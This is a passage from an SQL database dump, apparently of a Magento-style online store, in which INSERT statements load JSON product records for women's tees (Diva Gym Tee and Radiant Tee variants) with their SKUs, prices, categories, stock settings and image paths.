Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1493\":{\"sku\":\"WS11\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Cocona&reg; performance fabric|Polyester,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS11-XS-Green,size=XS,color=Green|sku=WS11-XS-Orange,size=XS,color=Orange|sku=WS11-XS-Yellow,size=XS,color=Yellow|sku=WS11-S-Green,size=S,color=Green|sku=WS11-S-Orange,size=S,color=Orange|sku=WS11-S-Yellow,size=S,color=Yellow|sku=WS11-M-Green,size=M,color=Green|sku=WS11-M-Orange,size=M,color=Orange|sku=WS11-M-Yellow,size=M,color=Yellow|sku=WS11-L-Green,size=L,color=Green|sku=WS11-L-Orange,size=L,color=Orange|sku=WS11-L-Yellow,size=L,color=Yellow|sku=WS11-XL-Green,size=XL,color=Green|sku=WS11-XL-Orange,size=XL,color=Orange|sku=WS11-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Cocona&reg; performance fabric|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"Yes\"},\"1494\":{\"sku\":\"WS12-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-XS-Blue\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1495\":{\"sku\":\"WS12-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-XS-Orange\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1496\":{\"sku\":\"WS12-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-XS-Purple\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1497\":{\"sku\":\"WS12-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-S-Blue\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1498\":{\"sku\":\"WS12-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-S-Orange\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"image\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws12-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1499\":{\"sku\":\"WS12-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-S-Purple\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(16, 'catalog_product', 'append', '{\"1500\":{\"sku\":\"WS12-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Radiant Tee-M-Blue\",\"description\":\"<p>So light and comfy, you\'ll love the Radiant Tee\'s organic fabric, feel, performance and style. You may never want to stop moving in this shirt.<\\/p>\\n<p>&bull; Salmon soft scoop neck tee.<br \\/>&bull; Athletic, semi-form fit.<br \\/>&bull; Flat seams prevent chafing.<br \\/>&bull; 67% Organic Cotton \\/ 28% Hemp \\/ 5% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"22\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"radiant-tee-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\